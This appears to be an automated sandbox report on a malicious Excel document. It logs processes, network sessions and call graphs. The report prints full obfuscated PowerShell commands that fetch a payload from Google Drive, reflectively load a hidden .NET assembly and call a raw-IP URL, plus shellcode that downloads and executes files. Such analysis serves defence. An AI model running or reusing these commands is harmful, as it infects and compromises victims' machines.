                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.2249165216.58.212.1294433932C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-24 06:56:02 UTC139OUTGET /download?id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp&export=download HTTP/1.1
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-10-24 06:56:02 UTC1905INHTTP/1.1 200 OK
                                                      Content-Type: text/html; charset=utf-8
                                                      Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Thu, 24 Oct 2024 06:56:02 GMT
                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2bAo07ZWcomF_vaIJPQHVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Resource-Policy: same-site
                                                      reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw0JBicEqfwRoCxKt_nmNdD8R7Np1nPQDEf2QusTLIXmIV4uFouv98B5vAj4-PjzIpqSblF8anFGWWpWaUlBQkFmQWpxaVpRbFGxkYmRgaGJrrGRjFFxgAAMLqI98"
                                                      Content-Length: 1692
                                                      X-GUploader-UploadID: AHmUCY19rObso2UlzjPZllGfZKRbl1MgcrKHwzbUjUJXh9NPAQ3gKwPQrN2qu3hHITxhqBA5w0Oap_LQUQ
                                                      Server: UploadServer
                                                      Set-Cookie: NID=518=AFRExPBAB3E7d9EvY2U3FPnJRY_bAaIEh_2iLi5ljlopM_F9ZBKoaBAfG3H90T64m_oYXphlIA0db1UeL4idsT3M6pUcMjtb8f-4A0qJ57rWK9IQcchUz2wFetJTSSlueyLyPirjcm-r36cNfX7H-q8eKtm1Mft1YCwmcqgb6mOIL_CWCr0; expires=Fri, 25-Apr-2025 06:56:02 GMT; path=/; domain=.google.com; HttpOnly
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2024-10-24 06:56:02 UTC1692INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 78 68 44 57 56 43 5a 79 6f 43 64 51 4f 4a 52 69 76 42 71 67 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="BxhDWVCZyoCdQOJRivBqgw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:02:55:01
                                                      Start date:24/10/2024
                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                      Imagebase:0x13f7e0000
                                                      File size:28'253'536 bytes
                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:02:55:50
                                                      Start date:24/10/2024
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543'304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:02:55:53
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs"
                                                      Imagebase:0x3e0000
                                                      File size:141'824 bytes
                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:02:55:56
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                      Imagebase:0x80000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:02:55:57
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))"
                                                      Imagebase:0x80000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:15.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:100%
                                                        Total number of Nodes:19
                                                        Total number of Limit Nodes:2
                                                        execution_graph 171 36605e2 GetPEB 172 36605f0 171->172 193 3660442 ExitProcess 194 366044e 193->194 173 3660588 URLDownloadToFileW 176 36605a1 173->176 177 36605a3 176->177 185 36605b6 177->185 180 36605b0 ShellExecuteW 191 36605db 180->191 182 36605cf 183 3660591 182->183 184 36605de ExitProcess 182->184 186 36605b9 ShellExecuteW 185->186 187 36605db ExitProcess 186->187 188 36605cf 186->188 187->188 189 36605a8 188->189 190 36605de ExitProcess 188->190 189->180 189->183 192 36605de ExitProcess 191->192

                                                        Callgraph

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 36605b6-36605c8 ShellExecuteW 2 36605cf-36605d2 0->2 3 36605ca call 36605db 0->3 5 3660624 2->5 6 36605d4 2->6 3->2 9 3660626-366062a 5->9 10 366062c-3660630 5->10 7 36605d6-36605e0 ExitProcess 6->7 8 3660645-3660647 6->8 14 3660657-3660658 8->14 9->10 12 3660638-366063f 9->12 10->8 13 3660632-3660636 10->13 15 3660643 12->15 16 3660641 12->16 13->8 13->12 15->8 18 3660649-3660652 15->18 16->8 20 3660654 18->20 21 366061b-366061e 18->21 20->14 21->18 22 3660620 21->22 22->5
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036605C8
                                                          • Part of subcall function 036605DB: ExitProcess.KERNEL32(00000000,?,036605CF), ref: 036605E0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.471908952.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
                                                        • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction ID: 68612af12ff6aa102850ed2ccfe8eae2d8232810b2c82a998aa521c987b8d916
                                                        • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction Fuzzy Hash: 3D0126B994C34230DBB0E22849257A6AB519BD17C0F8CC877E984D41C2C49485E3862D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 23 36605a1-36605ae call 36605b6 27 3660615-3660621 23->27 28 36605b0-36605d2 ShellExecuteW call 36605db 23->28 29 3660624 27->29 28->29 41 36605d4 28->41 31 3660626-366062a 29->31 32 366062c-3660630 29->32 31->32 34 3660638-366063f 31->34 35 3660645-3660647 32->35 36 3660632-3660636 32->36 38 3660643 34->38 39 3660641 34->39 40 3660657-3660658 35->40 36->34 36->35 38->35 43 3660649-3660652 38->43 39->35 41->35 42 36605d6-36605e0 ExitProcess 41->42 46 3660654 43->46 47 366061b-366061e 43->47 46->40 47->43 49 3660620 47->49 49->29
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.471908952.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
                                                        • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction ID: 31262c0d2e54f13c76cfcd1d00864bc8eb17992c4f3e6ee9d4e03f04416af476
                                                        • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction Fuzzy Hash: 0201787594C30170E3B0F3380DA8BABAA91EBC17C8F98C47BF594D80C2C2888963C61D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 50 3660588-366058c URLDownloadToFileW call 36605a1 52 3660591-36605a2 50->52
                                                        APIs
                                                        • URLDownloadToFileW.URLMON(00000000), ref: 0366058A
                                                          • Part of subcall function 036605A1: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036605C8
                                                          • Part of subcall function 036605A1: ExitProcess.KERNEL32(00000000,?,036605CF), ref: 036605E0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.471908952.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: ebf5e96f2bc49dbba065d4684396ca4769c62a751727c181b637c50444b864f6
                                                        • Instruction ID: e15a0c7f31531dc4a035d01e45076d91d21e450107d3c1eb2f4eed0f67d4113e
                                                        • Opcode Fuzzy Hash: ebf5e96f2bc49dbba065d4684396ca4769c62a751727c181b637c50444b864f6
                                                        • Instruction Fuzzy Hash: 8CC04CC590D3C04EDB4352745E39B542F640F16145F4A08EAC4898E8D3E48885448216

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 54 36605db-36605e0 ExitProcess
                                                        APIs
                                                        • ExitProcess.KERNEL32(00000000,?,036605CF), ref: 036605E0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.471908952.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                        • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                        • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                        • Instruction Fuzzy Hash:

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 56 36605e2-36605ed GetPEB 57 36605f0-3660601 call 366060a 56->57 60 3660603-3660607 57->60
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.471908952.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                        • Instruction ID: 62411dd1517b3cb3a6add4e45399ac4bc72e788e8537d7b9bf2b4c1b6e78bee4
                                                        • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                        • Instruction Fuzzy Hash: 6ED052712065029FC304DB08CA80E13F36AFFD8390B28D268E4008B71AD330E8A2CAD4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 61 3660442-3660469 ExitProcess call 366045b 64 36604bc-36604d8 61->64 65 366046c-3660471 61->65 71 36604da-36604e8 64->71 69 3660474 65->69 70 36604d9 65->70 72 3660476-3660494 call 366049e 69->72 73 36604e9-36604fd 69->73 70->71 72->73 82 3660496-36604b9 call 36604ea 72->82 82->64
                                                        APIs
                                                        • ExitProcess.KERNEL32(03660430), ref: 03660442
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.471908952.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: d933369f2482eb774c56a067e63a93078d87e84a78ef0f19e6b7553db9e75677
                                                        • Instruction ID: 5d9934ef8fe7cc3fbfe6bd6c6595fab47386b699d5a9162c89f069e8abb90868
                                                        • Opcode Fuzzy Hash: d933369f2482eb774c56a067e63a93078d87e84a78ef0f19e6b7553db9e75677
                                                        • Instruction Fuzzy Hash: 561122A680D7C0CFD332D3705AAA02AFF24BE1249031C89FFC4D64E5A3E2599502C3B6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.491459279.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_20d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba484abf67169502d80c0f559fb3aaef87740aeb31b641573b45758ef9dd6d68
                                                        • Instruction ID: 690136617818f00d9f199c46c7de9004028d762401cd17f30cf19d6734c1553a
                                                        • Opcode Fuzzy Hash: ba484abf67169502d80c0f559fb3aaef87740aeb31b641573b45758ef9dd6d68
                                                        • Instruction Fuzzy Hash: 2001F270516340EBF7104E66CCC4B66BF99EF41360F28C52AEC8D0B2C3C2799842CAB2
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.491459279.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_20d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b01bdadcbd2ede286027c5132519c5d3fb911e2097cbca06926a4c1acf3b154
                                                        • Instruction ID: e4c0c692af9ba6104159aa85bb875e34811c34cf3c96c127bb3fd0c53a68e3ba
                                                        • Opcode Fuzzy Hash: 6b01bdadcbd2ede286027c5132519c5d3fb911e2097cbca06926a4c1acf3b154
                                                        • Instruction Fuzzy Hash: CCF06D71505344AEEB108E16CCC8BA2FFD8EB51724F28C56AED884F682C2799C45CAB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L4#p$L4#p$L4#p$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f
                                                        • API String ID: 0-3076882873
                                                        • Opcode ID: e0643cfad77aa00291750c14c967d28695ab3d7da74a30a36be58cbb7b7fddae
                                                        • Instruction ID: 5b3628356e5bc792decf45e4634b148c99f139eddc8172b35951cdf519672c49
                                                        • Opcode Fuzzy Hash: e0643cfad77aa00291750c14c967d28695ab3d7da74a30a36be58cbb7b7fddae
                                                        • Instruction Fuzzy Hash: 39B21431B047908FDB199B66981076ABFB2FFC5315F2484BAD585CB291EB31CC45C7A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @Z,$@Z,$@Z,$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$[f$[f$[f$[f$[f$[f
                                                        • API String ID: 0-1204293036
                                                        • Opcode ID: d825bfc3bb798fbab7a95aeb1c587a08a04042d806f90e9e39763433840bd8a4
                                                        • Instruction ID: 04df460ed063e98d63406a98e7080a9b7eed8750f0333304f2f52eb198fbf166
                                                        • Opcode Fuzzy Hash: d825bfc3bb798fbab7a95aeb1c587a08a04042d806f90e9e39763433840bd8a4
                                                        • Instruction Fuzzy Hash: 37B21931B043918FDB298B66881076ABFB9FFD5311F2884BBD585CB295DA71CC41C7A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8#f$8#f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$[f$[f
                                                        • API String ID: 0-3693844340
                                                        • Opcode ID: e63c0ef35cc5574b0716dc6bfeedaef0656f5de26f2b52ae229e8c96fe4da546
                                                        • Instruction ID: 5af79cada2f4f4742b4b1474f26881688ddb926eb185e3b5550dabc6fd2fec12
                                                        • Opcode Fuzzy Hash: e63c0ef35cc5574b0716dc6bfeedaef0656f5de26f2b52ae229e8c96fe4da546
                                                        • Instruction Fuzzy Hash: FB221631B043908FDB289B6A985476ABFF2FFD5310F2484BAD585CB252DA31CD45CB62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f
                                                        • API String ID: 0-631350690
                                                        • Opcode ID: 647f5faf728ec6950796dfbe0af2c7866696d39c9e88b9ae41ade946f03cfcf4
                                                        • Instruction ID: ee20716d0ab692a0b2e4c3ea04e15e3d33ec34cab69b13a4318a608f30b8b90c
                                                        • Opcode Fuzzy Hash: 647f5faf728ec6950796dfbe0af2c7866696d39c9e88b9ae41ade946f03cfcf4
                                                        • Instruction Fuzzy Hash: E6220471B043919FDB299B36881476ABFB2BFC1311F2484BAD485CB291DB71CE45C7A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8#f$8#f$h<E$h<E
                                                        • API String ID: 0-1676831642
                                                        • Opcode ID: 69d5b76fc3a1b1a8b735d474f6653c04d6d140dcbe28791592f6d48c7957cf7d
                                                        • Instruction ID: 38464fd27cd92fefc08dba3d43ea5e8f2825e5e4b75774e25c804df5fd412723
                                                        • Opcode Fuzzy Hash: 69d5b76fc3a1b1a8b735d474f6653c04d6d140dcbe28791592f6d48c7957cf7d
                                                        • Instruction Fuzzy Hash: 6BB103317003858FDB289A7688107AABBA5FF91310F2494BAD4C9DB2D1DBB1CC81C761
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489940332.00000000005E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_5e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: H;E$H;E
                                                        • API String ID: 0-2147187201
                                                        • Opcode ID: 029d84d964f8bad1d3b728b47e73d238b0a51026a74f188c489101675c6f0312
                                                        • Instruction ID: e19889ef7cb0022414ccf62025cde1cc8417bf5cf5e89cc5f2b6fcb1de9220a5
                                                        • Opcode Fuzzy Hash: 029d84d964f8bad1d3b728b47e73d238b0a51026a74f188c489101675c6f0312
                                                        • Instruction Fuzzy Hash: 03F0C87075031867D62426718815F6F2AABDBD4B52F508019F906DF3C2DDB1EC40436A
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.489845722.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
